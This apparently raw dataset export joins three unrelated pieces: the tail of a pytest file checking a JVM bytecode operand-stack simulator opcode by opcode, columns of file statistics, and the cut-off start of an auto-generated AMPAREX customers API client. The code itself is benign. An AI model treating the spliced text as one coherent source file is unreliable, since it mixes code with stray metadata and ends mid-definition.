assert stack._stack[1] == OperandType.Reference
stack.update_stack("invokedynamic", make_concat_with_constants, 0, 0)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_invokeinterface():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("invokeinterface", cf.constants.create_method_ref(
"java/lang/CharSequence",
"length",
"()I"
), 0)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_invokespecial():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("invokespecial", cf.constants.create_method_ref(
"java/lang/Object",
"<init>",
"()V"
))
assert len(stack._stack) == 0
def test_invokestatic():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("invokestatic", cf.constants.create_method_ref(
"java/lang/System",
"exit",
"(I)V"
))
assert len(stack._stack) == 0
def test_invokevirtual():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("invokevirtual", cf.constants.create_method_ref(
"java/lang/Object",
"toString",
"()Ljava/lang/String;"
))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_ior():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("ior")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_irem():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("irem")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_ireturn():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("ireturn")
assert len(stack._stack) == 0
def test_ishl():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("ishl")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_ishr():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("ishr")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_istore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("istore", 0)
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("istore_0")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("istore_1")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("istore_2")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("istore_3")
def test_isub():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("isub")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_iushr():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iushr")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_ixor():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("ixor")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_jsr():
stack = Stack()
stack.update_stack("jsr")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_jsr_w():
stack = Stack()
stack.update_stack("jsr_w")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_l2d():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("l2d")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_l2f():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("l2f")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
def test_l2i():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("l2i")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_ladd():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("ladd")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_laload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Long.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("laload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_land():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("land")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Long.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lconst_0")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Long
stack.update_stack("lastore")
assert len(stack._stack) == 0
def test_lcmp():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lcmp")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_lconst():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack = Stack()
stack.update_stack("lconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_ldc():
stack = Stack()
stack.update_stack("ldc", cf.constants.create_integer(1))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack = Stack()
stack.update_stack("ldc", cf.constants.create_float(1.0))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Float
stack = Stack()
stack.update_stack("ldc", cf.constants.create_string("test"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack = Stack()
stack.update_stack("ldc", cf.constants.create_class("java/lang/String"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_ldc2_w():
stack = Stack()
stack.update_stack("ldc2_w", cf.constants.create_long(1))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack = Stack()
stack.update_stack("ldc2_w", cf.constants.create_double(1.0))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Double
def test_ldiv():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("ldiv")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lload():
stack = Stack()
stack.update_stack("lload", 0)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack = Stack()
stack.update_stack("lload_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack = Stack()
stack.update_stack("lload_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack = Stack()
stack.update_stack("lload_2")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack = Stack()
stack.update_stack("lload_3")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lmul():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lmul")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lneg():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lneg")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lookupswitch():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("lookupswitch")
assert len(stack._stack) == 0
def test_lor():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lor")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lrem():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lrem")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lreturn():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lreturn")
assert len(stack._stack) == 0
def test_lshl():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lshl")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lshr():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lshr")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lstore():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lstore", 0)
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lstore_0")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lstore_1")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lstore_2")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lstore_3")
assert len(stack._stack) == 0
def test_lsub():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lsub")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lushr():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lushr")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lxor():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lxor")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_monitorenter():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("monitorenter")
assert len(stack._stack) == 0
def test_monitorexit():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("monitorexit")
assert len(stack._stack) == 0
def test_multianewarray():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("multianewarray", cf.constants.create_class("java/lang/String"), 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_new():
stack = Stack()
stack.update_stack("new", cf.constants.create_class("java/lang/String"))
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_newarray():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Integer.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_nop():
stack = Stack()
stack.update_stack("nop")
assert len(stack._stack) == 0
def test_pop():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("pop")
assert len(stack._stack) == 0
def test_pop2():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("pop2")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("pop2")
assert len(stack._stack) == 0
def test_putfield():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("putfield", cf.constants.create_field_ref("java/lang/String", "value", "I"))
assert len(stack._stack) == 0
def test_putstatic():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("putstatic", cf.constants.create_field_ref("java/lang/String", "value", "I"))
assert len(stack._stack) == 0
def test_ret():
stack = Stack()
stack.update_stack("ret")
assert len(stack._stack) == 0
def test_return():
stack = Stack()
stack.update_stack("return")
assert len(stack._stack) == 0
def test_saload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Short.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("saload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Short
def test_sastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("newarray", OperandType.Short.array_type)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("sastore")
assert len(stack._stack) == 0
def test_sipush():
stack = Stack()
stack.update_stack("sipush", 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_swap():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("swap")
assert len(stack._stack) == 2
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
def test_tableswitch():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("tableswitch", 0, 0, 0, 0)
assert len(stack._stack) == 0
| 30.299856
| 118
| 0.67401
| 8,302
| 63,054
| 4.892074
| 0.027945
| 0.318363
| 0.183188
| 0.217068
| 0.942828
| 0.934456
| 0.928079
| 0.909612
| 0.89969
| 0.89383
| 0
| 0.02451
| 0.18795
| 63,054
| 2,080
| 119
| 30.314423
| 0.768685
| 0
| 0
| 0.79217
| 0
| 0.000576
| 0.065801
| 0.005614
| 0
| 0
| 0
| 0
| 0.515256
| 1
| 0.080023
| false
| 0
| 0.003454
| 0
| 0.083477
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
03f7695b0d98f72cfdfbf3d36ebfa2e923717419
| 57,891
|
py
|
Python
|
amparex/api/customers_api.py
|
Inch4Tk/amparex_python_api
|
f372c15a1e67293329bdd8bee8ad66624ed1341f
|
[
"Apache-2.0"
] | null | null | null |
amparex/api/customers_api.py
|
Inch4Tk/amparex_python_api
|
f372c15a1e67293329bdd8bee8ad66624ed1341f
|
[
"Apache-2.0"
] | null | null | null |
amparex/api/customers_api.py
|
Inch4Tk/amparex_python_api
|
f372c15a1e67293329bdd8bee8ad66624ed1341f
|
[
"Apache-2.0"
] | null | null | null |
"""
AMPAREX Rest API Documentation
This is the description of the AMPAREX Rest API. All REST calls plus the corresponding data model are described in this documentation. Direct calls to the server are possible over this page.<br/>Following steps are needed to use the API:<br/><br/>1. Get the alias identifier of your login account from AMPAREX Software (Branch office administration) -> Service accounts -> your service account -> copy alias token)<br/>2. Please use the login URL /alias/{alias}/login under section \"Login\" below with your credentials to get a valid bearer token.<br/>3. Copy bearer token from login response<br/>3. Then click \"Authorize\" on the top of this page<br/>4. Insert into the field \"value\": \"Bearer {Your Bearer token}\" (without {}) for example \"Bearer 334d34d3dgh5tz5h5h\"<br/>4. Click Authorize<br/>5. Bearer token will be automatically used in the header for every following API call.<br/>6. Now you are ready to use the API<br/><br/>See also [documentation](https://manual.amparex.com/display/HAN/AMPAREX+API) for help<br/><br/>Documentation of all the used fields and objects is at the bottom of this page called \"Models\" # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from amparex.api_client import ApiClient, Endpoint as _Endpoint
from amparex.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from amparex.model.creation_response import CreationResponse
from amparex.model.customer import Customer
from amparex.model.customer_search_query import CustomerSearchQuery
from amparex.model.customer_to_save import CustomerToSave
from amparex.model.document import Document
from amparex.model.document_search_query import DocumentSearchQuery
from amparex.model.document_to_save import DocumentToSave
from amparex.model.list_result_wrapper_customer import ListResultWrapperCustomer
from amparex.model.list_result_wrapper_document import ListResultWrapperDocument
from amparex.model.list_result_wrapper_marketing_contact import ListResultWrapperMarketingContact
class CustomersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.create_customer_using_post_endpoint = _Endpoint(
settings={
'response_type': (CreationResponse,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers',
'operation_id': 'create_customer_using_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'alias',
'to_save',
],
'required': [
'alias',
'to_save',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'to_save':
(CustomerToSave,),
},
'attribute_map': {
'alias': 'alias',
},
'location_map': {
'alias': 'path',
'to_save': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.create_document_using_post_endpoint = _Endpoint(
settings={
'response_type': (CreationResponse,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{id}/documents',
'operation_id': 'create_document_using_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'alias',
'id',
'to_save',
],
'required': [
'alias',
'id',
'to_save',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'id':
(str,),
'to_save':
(DocumentToSave,),
},
'attribute_map': {
'alias': 'alias',
'id': 'id',
},
'location_map': {
'alias': 'path',
'id': 'path',
'to_save': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_customer_order_by_fields_using_get_endpoint = _Endpoint(
settings={
'response_type': ([str],),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/orderbyfields',
'operation_id': 'get_customer_order_by_fields_using_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'alias',
],
'required': [
'alias',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
},
'attribute_map': {
'alias': 'alias',
},
'location_map': {
'alias': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_customer_using_get_endpoint = _Endpoint(
settings={
'response_type': (Customer,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{id}',
'operation_id': 'get_customer_using_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'alias',
'id',
],
'required': [
'alias',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'id':
(str,),
},
'attribute_map': {
'alias': 'alias',
'id': 'id',
},
'location_map': {
'alias': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_document_binary_using_get_endpoint = _Endpoint(
settings={
'response_type': (str,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{cid}/documents/{did}/binary',
'operation_id': 'get_document_binary_using_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'alias',
'cid',
'did',
'image_width',
],
'required': [
'alias',
'cid',
'did',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'cid':
(str,),
'did':
(str,),
'image_width':
(int,),
},
'attribute_map': {
'alias': 'alias',
'cid': 'cid',
'did': 'did',
'image_width': 'imageWidth',
},
'location_map': {
'alias': 'path',
'cid': 'path',
'did': 'path',
'image_width': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/octet-stream',
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_document_using_get_endpoint = _Endpoint(
settings={
'response_type': (Document,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{cid}/documents/{did}',
'operation_id': 'get_document_using_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'alias',
'cid',
'did',
],
'required': [
'alias',
'cid',
'did',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'cid':
(str,),
'did':
(str,),
},
'attribute_map': {
'alias': 'alias',
'cid': 'cid',
'did': 'did',
},
'location_map': {
'alias': 'path',
'cid': 'path',
'did': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_marketing_contacts_using_get_endpoint = _Endpoint(
settings={
'response_type': (ListResultWrapperMarketingContact,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{id}/marketingcontacts',
'operation_id': 'get_marketing_contacts_using_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'alias',
'id',
],
'required': [
'alias',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'id':
(str,),
},
'attribute_map': {
'alias': 'alias',
'id': 'id',
},
'location_map': {
'alias': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.search_customers_using_post_endpoint = _Endpoint(
settings={
'response_type': (ListResultWrapperCustomer,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/search',
'operation_id': 'search_customers_using_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'alias',
'customer_search_query',
],
'required': [
'alias',
'customer_search_query',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'customer_search_query':
(CustomerSearchQuery,),
},
'attribute_map': {
'alias': 'alias',
},
'location_map': {
'alias': 'path',
'customer_search_query': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.search_documents_using_post_endpoint = _Endpoint(
settings={
'response_type': (ListResultWrapperDocument,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{id}/documents/search',
'operation_id': 'search_documents_using_post',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'alias',
'id',
'search_query',
],
'required': [
'alias',
'id',
'search_query',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'id':
(str,),
'search_query':
(DocumentSearchQuery,),
},
'attribute_map': {
'alias': 'alias',
'id': 'id',
},
'location_map': {
'alias': 'path',
'id': 'path',
'search_query': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.search_documents_using_post1_endpoint = _Endpoint(
settings={
'response_type': (ListResultWrapperDocument,),
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/treatments/{id}/documents/search',
'operation_id': 'search_documents_using_post1',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'alias',
'id',
'search_query',
],
'required': [
'alias',
'id',
'search_query',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'id':
(str,),
'search_query':
(DocumentSearchQuery,),
},
'attribute_map': {
'alias': 'alias',
'id': 'id',
},
'location_map': {
'alias': 'path',
'id': 'path',
'search_query': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.update_customer_using_patch_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{id}',
'operation_id': 'update_customer_using_patch',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'alias',
'id',
'to_update',
],
'required': [
'alias',
'id',
'to_update',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'id':
(str,),
'to_update':
(CustomerToSave,),
},
'attribute_map': {
'alias': 'alias',
'id': 'id',
},
'location_map': {
'alias': 'path',
'id': 'path',
'to_update': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.update_document_using_patch_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'security_token'
],
'endpoint_path': '/alias/{alias}/protected/customers/{cid}/documents/{did}',
'operation_id': 'update_document_using_patch',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'alias',
'cid',
'did',
'to_update',
],
'required': [
'alias',
'cid',
'did',
'to_update',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alias':
(str,),
'cid':
(str,),
'did':
(str,),
'to_update':
(DocumentToSave,),
},
'attribute_map': {
'alias': 'alias',
